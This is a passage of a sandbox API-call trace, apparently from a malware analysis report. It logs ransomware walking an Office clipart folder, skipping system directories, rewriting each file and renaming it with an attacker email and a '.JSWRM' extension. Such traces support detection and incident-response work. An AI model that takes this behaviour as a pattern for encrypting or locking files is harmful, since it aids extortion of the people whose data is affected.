CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0088.189] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232171.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232171.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.190] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13098) returned 1 [0088.190] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3320) returned 0x24d210 [0088.191] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3320, lpOverlapped=0x0) returned 1 [0088.193] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.193] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3320, lpOverlapped=0x0) returned 1 [0088.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.193] CloseHandle (hObject=0x314) returned 1 [0088.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0088.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0088.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0088.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0088.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0088.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0088.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0088.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0088.194] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232171.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232171.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232171.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232171.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0088.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0088.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0088.195] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec9380a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec9380a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xec9380a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6bc2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0232393.WMF", cAlternateFileName="")) returned 1 [0088.195] lstrcmpiW (lpString1="J0232393.WMF", lpString2=".") returned 1 [0088.195] lstrcmpiW (lpString1="J0232393.WMF", lpString2="..") returned 1 [0088.195] lstrcmpiW (lpString1="J0232393.WMF", lpString2="...") returned 1 [0088.195] lstrcmpiW (lpString1="J0232393.WMF", lpString2="windows") returned -1 [0088.195] lstrcmpiW (lpString1="J0232393.WMF", lpString2="recovery") returned -1 [0088.195] lstrcmpiW (lpString1="J0232393.WMF", lpString2="perflogs") returned -1 [0088.195] lstrcmpiW (lpString1="J0232393.WMF", lpString2="documents and settings") returned 1 [0088.195] lstrcmpiW (lpString1="J0232393.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.195] lstrcmpiW (lpString1="J0232393.WMF", lpString2="system volume information") returned -1 [0088.195] lstrcmpiW (lpString1="J0232393.WMF", lpString2="msocache") returned -1 [0088.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0088.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0232393.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0232393.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0232393.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0088.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0088.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0232393.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0232393.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0232393.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0088.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0088.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0088.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0088.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232393.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232393.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.196] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=27586) returned 1 [0088.196] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6bc0) returned 0x24d210 [0088.196] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6bc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6bc0, lpOverlapped=0x0) returned 1 [0088.199] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.199] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6bc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6bc0, lpOverlapped=0x0) returned 1 [0088.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.200] CloseHandle (hObject=0x314) returned 1 [0088.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0088.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0088.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0088.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0088.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0088.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0088.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.201] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232393.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232393.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232393.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232393.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0088.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0088.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0088.202] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec9380a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec9380a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf42d018, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa086, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0232395.WMF", cAlternateFileName="")) returned 1 [0088.202] lstrcmpiW (lpString1="J0232395.WMF", lpString2=".") returned 1 [0088.202] lstrcmpiW (lpString1="J0232395.WMF", lpString2="..") returned 1 [0088.202] lstrcmpiW (lpString1="J0232395.WMF", lpString2="...") returned 1 [0088.202] lstrcmpiW (lpString1="J0232395.WMF", lpString2="windows") returned -1 [0088.202] lstrcmpiW (lpString1="J0232395.WMF", lpString2="recovery") returned -1 [0088.202] lstrcmpiW (lpString1="J0232395.WMF", lpString2="perflogs") returned -1 [0088.202] lstrcmpiW (lpString1="J0232395.WMF", lpString2="documents and settings") returned 1 [0088.202] lstrcmpiW (lpString1="J0232395.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.202] lstrcmpiW (lpString1="J0232395.WMF", lpString2="system volume information") returned -1 [0088.202] lstrcmpiW (lpString1="J0232395.WMF", lpString2="msocache") returned -1 [0088.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0088.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0232395.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0232395.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0232395.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0088.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0088.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0232395.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0232395.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0232395.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0088.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0088.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0088.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0088.202] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232395.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232395.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.203] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=41094) returned 1 [0088.203] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa080) returned 0x24d210 [0088.204] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xa080, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xa080, lpOverlapped=0x0) returned 1 [0088.208] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.208] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xa080, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xa080, lpOverlapped=0x0) returned 1 [0088.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.209] CloseHandle (hObject=0x314) returned 1 [0088.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0088.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0088.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0088.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0088.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0088.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0088.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0088.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0088.216] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232395.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232395.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232395.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232395.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0088.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0088.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0088.217] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec9380a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec9380a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xec9380a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x380a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0232795.WMF", cAlternateFileName="")) returned 1 [0088.218] lstrcmpiW (lpString1="J0232795.WMF", lpString2=".") returned 1 [0088.218] lstrcmpiW (lpString1="J0232795.WMF", lpString2="..") returned 1 [0088.218] lstrcmpiW (lpString1="J0232795.WMF", lpString2="...") returned 1 [0088.218] lstrcmpiW (lpString1="J0232795.WMF", lpString2="windows") returned -1 [0088.218] lstrcmpiW (lpString1="J0232795.WMF", lpString2="recovery") returned -1 [0088.218] lstrcmpiW (lpString1="J0232795.WMF", lpString2="perflogs") returned -1 [0088.218] lstrcmpiW (lpString1="J0232795.WMF", lpString2="documents and settings") returned 1 [0088.218] lstrcmpiW (lpString1="J0232795.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.218] lstrcmpiW (lpString1="J0232795.WMF", lpString2="system volume information") returned -1 [0088.218] lstrcmpiW (lpString1="J0232795.WMF", lpString2="msocache") returned -1 [0088.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0088.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0232795.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0232795.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0232795.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0088.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0088.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0232795.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0232795.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0232795.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0088.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0088.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0088.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0088.218] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232795.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232795.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.219] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14346) returned 1 [0088.219] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3800) returned 0x24d210 [0088.219] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3800, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3800, lpOverlapped=0x0) returned 1 [0088.260] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.261] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3800, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3800, lpOverlapped=0x0) returned 1 [0088.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.261] CloseHandle (hObject=0x314) returned 1 [0088.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0088.261] 